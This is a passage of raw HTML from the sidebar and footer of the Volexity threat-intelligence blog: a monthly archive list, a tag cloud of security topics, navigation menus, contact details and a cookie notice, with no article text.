href='https://www.volexity.com/blog/2022/02/'>February 2022</a></li> <li><a href='https://www.volexity.com/blog/2021/12/'>December 2021</a></li> <li><a href='https://www.volexity.com/blog/2021/08/'>August 2021</a></li> <li><a href='https://www.volexity.com/blog/2021/05/'>May 2021</a></li> <li><a href='https://www.volexity.com/blog/2021/03/'>March 2021</a></li> <li><a href='https://www.volexity.com/blog/2020/12/'>December 2020</a></li> <li><a href='https://www.volexity.com/blog/2020/11/'>November 2020</a></li> <li><a href='https://www.volexity.com/blog/2020/04/'>April 2020</a></li> <li><a href='https://www.volexity.com/blog/2020/03/'>March 2020</a></li> <li><a href='https://www.volexity.com/blog/2019/09/'>September 2019</a></li> <li><a href='https://www.volexity.com/blog/2018/11/'>November 2018</a></li> <li><a href='https://www.volexity.com/blog/2018/09/'>September 2018</a></li> <li><a href='https://www.volexity.com/blog/2018/08/'>August 2018</a></li> <li><a href='https://www.volexity.com/blog/2018/07/'>July 2018</a></li> <li><a href='https://www.volexity.com/blog/2018/06/'>June 2018</a></li> <li><a href='https://www.volexity.com/blog/2018/04/'>April 2018</a></li> <li><a href='https://www.volexity.com/blog/2017/11/'>November 2017</a></li> <li><a href='https://www.volexity.com/blog/2017/07/'>July 2017</a></li> <li><a href='https://www.volexity.com/blog/2017/03/'>March 2017</a></li> <li><a href='https://www.volexity.com/blog/2016/11/'>November 2016</a></li> <li><a href='https://www.volexity.com/blog/2015/10/'>October 2015</a></li> <li><a href='https://www.volexity.com/blog/2015/07/'>July 2015</a></li> <li><a href='https://www.volexity.com/blog/2015/06/'>June 2015</a></li> <li><a href='https://www.volexity.com/blog/2015/04/'>April 2015</a></li> <li><a href='https://www.volexity.com/blog/2014/10/'>October 2014</a></li> <li><a href='https://www.volexity.com/blog/2014/09/'>September 2014</a></li> </ul> </div></li><li class="widget widget_categorizedtagcloudwidget"><div class="widget-content"><h4 class="widget-title">Tags</h4> <div id="categorized-tag-cloud"><span id="categorized-tag-cloud-el-1"><a href="https://www.volexity.com/blog/tag/vpn/" class="tag-cloud-link tag-link-24 tag-link-position-1" style="font-size: 11.818181818182pt;" aria-label="VPN (5 items)">VPN</a></span> <span id="categorized-tag-cloud-el-2"><a href="https://www.volexity.com/blog/tag/webshell/" class="tag-cloud-link tag-link-84 tag-link-position-2" style="font-size: 11.818181818182pt;" aria-label="webshell (5 items)">webshell</a></span> <span id="categorized-tag-cloud-el-3"><a href="https://www.volexity.com/blog/tag/exploit/" class="tag-cloud-link tag-link-87 tag-link-position-3" style="font-size: 15.555555555556pt;" aria-label="Exploit (13 items)">Exploit</a></span> <span id="categorized-tag-cloud-el-4"><a href="https://www.volexity.com/blog/tag/china/" class="tag-cloud-link tag-link-42 tag-link-position-4" style="font-size: 14.444444444444pt;" aria-label="China (10 items)">China</a></span> <span id="categorized-tag-cloud-el-5"><a href="https://www.volexity.com/blog/tag/scanning/" class="tag-cloud-link tag-link-31 tag-link-position-5" style="font-size: 11.010101010101pt;" aria-label="Scanning (4 items)">Scanning</a></span> <span id="categorized-tag-cloud-el-6"><a href="https://www.volexity.com/blog/tag/rce/" class="tag-cloud-link tag-link-174 tag-link-position-6" style="font-size: 12.525252525253pt;" aria-label="RCE (6 items)">RCE</a></span> <span id="categorized-tag-cloud-el-7"><a href="https://www.volexity.com/blog/tag/memory-forensics/" class="tag-cloud-link tag-link-65 tag-link-position-7" style="font-size: 11.818181818182pt;" aria-label="memory forensics (5 items)">memory forensics</a></span> <span id="categorized-tag-cloud-el-8"><a href="https://www.volexity.com/blog/tag/north-korea/" class="tag-cloud-link tag-link-117 tag-link-position-8" style="font-size: 11.818181818182pt;" aria-label="North Korea (5 items)">North Korea</a></span> <span id="categorized-tag-cloud-el-9"><a href="https://www.volexity.com/blog/tag/phishing/" class="tag-cloud-link tag-link-107 tag-link-position-9" style="font-size: 10pt;" aria-label="phishing (3 items)">phishing</a></span> <span id="categorized-tag-cloud-el-10"><a href="https://www.volexity.com/blog/tag/0day/" class="tag-cloud-link tag-link-131 tag-link-position-10" style="font-size: 11.818181818182pt;" aria-label="0day (5 items)">0day</a></span> <span id="categorized-tag-cloud-el-11"><a href="https://www.volexity.com/blog/tag/dfir/" class="tag-cloud-link tag-link-133 tag-link-position-11" style="font-size: 10pt;" aria-label="dfir (3 items)">dfir</a></span> <span id="categorized-tag-cloud-el-12"><a href="https://www.volexity.com/blog/tag/vulnerabilities/" class="tag-cloud-link tag-link-34 tag-link-position-12" style="font-size: 11.010101010101pt;" aria-label="vulnerabilities (4 items)">vulnerabilities</a></span> <span id="categorized-tag-cloud-el-13"><a href="https://www.volexity.com/blog/tag/threat-intelligence/" class="tag-cloud-link tag-link-93 tag-link-position-13" style="font-size: 12.525252525253pt;" aria-label="Threat Intelligence (6 items)">Threat Intelligence</a></span> <span id="categorized-tag-cloud-el-14"><a href="https://www.volexity.com/blog/tag/spear-phishing/" class="tag-cloud-link tag-link-45 tag-link-position-14" style="font-size: 11.010101010101pt;" aria-label="spear phishing (4 items)">spear phishing</a></span> <span id="categorized-tag-cloud-el-15"><a href="https://www.volexity.com/blog/tag/volcano/" class="tag-cloud-link tag-link-148 tag-link-position-15" style="font-size: 10pt;" aria-label="volcano (3 items)">volcano</a></span> <span id="categorized-tag-cloud-el-16"><a href="https://www.volexity.com/blog/tag/exploits/" class="tag-cloud-link tag-link-33 tag-link-position-16" style="font-size: 15.151515151515pt;" aria-label="exploits (12 items)">exploits</a></span> <span id="categorized-tag-cloud-el-17"><a href="https://www.volexity.com/blog/tag/pulsesecure/" class="tag-cloud-link tag-link-172 tag-link-position-17" style="font-size: 11.010101010101pt;" aria-label="pulsesecure (4 items)">pulsesecure</a></span> <span id="categorized-tag-cloud-el-18"><a href="https://www.volexity.com/blog/tag/apt/" class="tag-cloud-link tag-link-35 tag-link-position-18" style="font-size: 20pt;" aria-label="APT (38 items)">APT</a></span> <span id="categorized-tag-cloud-el-19"><a href="https://www.volexity.com/blog/tag/ivanti-connect-secure/" class="tag-cloud-link tag-link-173 tag-link-position-19" style="font-size: 11.010101010101pt;" aria-label="ivanti connect secure (4 items)">ivanti connect secure</a></span> <span id="categorized-tag-cloud-el-20"><a href="https://www.volexity.com/blog/tag/malware/" class="tag-cloud-link tag-link-106 tag-link-position-20" style="font-size: 11.818181818182pt;" aria-label="malware (5 items)">malware</a></span> </div> <style> #categorized-tag-cloud a, #categorized-tag-cloud a:visited { text-decoration:none; } #categorized-tag-cloud a:hover { text-decoration:none; color:#3b97d3; } #categorized-tag-cloud-el-1 a, #categorized-tag-cloud-el-1 a:visited { color:#555555; } #categorized-tag-cloud-el-2 a, #categorized-tag-cloud-el-2 a:visited { color:#555555; } #categorized-tag-cloud-el-3 a, #categorized-tag-cloud-el-3 a:visited { color:#555555; } #categorized-tag-cloud-el-4 a, #categorized-tag-cloud-el-4 a:visited { color:#555555; } #categorized-tag-cloud-el-5 a, #categorized-tag-cloud-el-5 a:visited { color:#555555; } #categorized-tag-cloud-el-6 a, #categorized-tag-cloud-el-6 a:visited { color:#555555; } #categorized-tag-cloud-el-7 a, #categorized-tag-cloud-el-7 a:visited { color:#555555; } #categorized-tag-cloud-el-8 a, #categorized-tag-cloud-el-8 a:visited { color:#555555; } #categorized-tag-cloud-el-9 a, #categorized-tag-cloud-el-9 a:visited { color:#555555; } #categorized-tag-cloud-el-10 a, #categorized-tag-cloud-el-10 a:visited { color:#555555; } #categorized-tag-cloud-el-11 a, #categorized-tag-cloud-el-11 a:visited { color:#555555; } #categorized-tag-cloud-el-12 a, #categorized-tag-cloud-el-12 a:visited { color:#555555; } #categorized-tag-cloud-el-13 a, #categorized-tag-cloud-el-13 a:visited { color:#555555; } #categorized-tag-cloud-el-14 a, #categorized-tag-cloud-el-14 a:visited { color:#555555; } #categorized-tag-cloud-el-15 a, #categorized-tag-cloud-el-15 a:visited { color:#555555; } #categorized-tag-cloud-el-16 a, #categorized-tag-cloud-el-16 a:visited { color:#555555; } #categorized-tag-cloud-el-17 a, #categorized-tag-cloud-el-17 a:visited { color:#555555; } #categorized-tag-cloud-el-18 a, #categorized-tag-cloud-el-18 a:visited { color:#555555; } #categorized-tag-cloud-el-19 a, #categorized-tag-cloud-el-19 a:visited { color:#555555; } #categorized-tag-cloud-el-20 a, #categorized-tag-cloud-el-20 a:visited { color:#555555; } </style></div></li> </ul> </aside> </section> </div> </main> <footer class="footer"> <div class="footer-container container"> <div class="footer-col-first col-md-3 no-padding"> <a class="footer-logo" href="https://www.volexity.com"><img src="https://www.volexity.com/wp-content/themes/volexity/dist/images/logo.png" alt="Volexity"></a> <address class="footer-copyright">© 2024 Volexity. All Rights Reserved.</address> </div> <ul id="menu-footer-menu" class="footer-menu-list col-md-4 col-xs-12"><li id="menu-item-57" class="nav-header menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-57"><a href="/company/about/">About</a> <ul class="sub-menu"> <li id="menu-item-59" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-59"><a href="https://www.volexity.com/company/about/">About Us</a></li> <li id="menu-item-58" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-58"><a href="https://www.volexity.com/blog/">Blog</a></li> <li id="menu-item-395" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-395"><a href="https://www.volexity.com/privacy-policy/">Privacy Policy</a></li> </ul> </li> <li id="menu-item-60" class="nav-header menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-60"><a href="/solutions/">Solutions</a> <ul class="sub-menu"> <li id="menu-item-400" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-400"><a href="https://www.volexity.com/company/contact/">Request A Demo</a></li> <li id="menu-item-61" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-61"><a href="https://www.volexity.com/products-overview/">Products</a></li> <li id="menu-item-669" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-669"><a href="https://www.volexity.com/services-overview/">Services</a></li> </ul> </li> </ul> <div class="footer-address col-md-3 col-xs-12"> <p class="footer-header">Contact</p> <ul> <li class="footer-address--address icon-location-marker"> 11654 Plaza America Dr #774<br /> Reston, VA 20190-4700 </li> <li class="footer-address--phone icon-phone-mobile">1-888-825-1975</li> </ul> </div> <div class="footer-social col-md-2 no-padding"> <p class="footer-header">Connect</p> <ul> <li class="footer-social-holder"><a href="https://www.facebook.com/volexity" target="_blank" class="icon-facebook footer-social--link"></a></li> <li class="footer-social-holder"><a href="https://twitter.com/volexity" target="_blank" class="icon-twitter footer-social--link"></a></li> <li class="footer-social-holder"><a href="https://www.linkedin.com/company/volexity" target="_blank" class="icon-linkedin footer-social--link"></a></li> <li class="footer-social-holder"><a href="https://infosec.exchange/@volexity" target="_blank" class="fa-mastodon footer-social--link"></a></li> </ul> </div> </div> <div id="back-to-top" class="icon-slide-left"></div> <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" id="main-js-extra"> /* <![CDATA[ */ var urls = {"base":"https:\/\/www.volexity.com","theme":"https:\/\/www.volexity.com\/wp-content\/themes\/volexity","ajax":"https:\/\/www.volexity.com\/wp-admin\/admin-ajax.php"}; var info = []; /* ]]> */ </script> <script type="text/javascript" src="https://www.volexity.com/wp-content/themes/volexity/dist/scripts/scripts.min.js?ver=6.6.2" id="main-js"></script> <script type="text/javascript" src="https://www.volexity.com/wp-includes/js/comment-reply.min.js?ver=6.6.2" id="comment-reply-js" async="async" data-wp-strategy="async"></script>  <div id="cookie-notice" role="dialog" class="cookie-notice-hidden cookie-revoke-hidden cn-position-bottom" aria-label="Cookie Notice" style="background-color: rgba(0,0,0,1);"><div class="cookie-notice-container" style="color: #fff"><span id="cn-notice-text" class="cn-text-container">This Website uses cookies, which are necessary to its functioning and required to achieve the purposes illustrated in our <a href="/privacy-policy/#cookies">Cookie Policy</a>. By clicking the button, you consent to our use of cookies.</span><span id="cn-notice-buttons" class="cn-buttons-container"><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button cn-button-custom box-cta" aria-label="Agree & Close">Agree & Close</a></span><span id="cn-close-notice" data-cookie-set="accept" class="cn-close-icon" title="No"></span></div> </div> </footer></body> </html>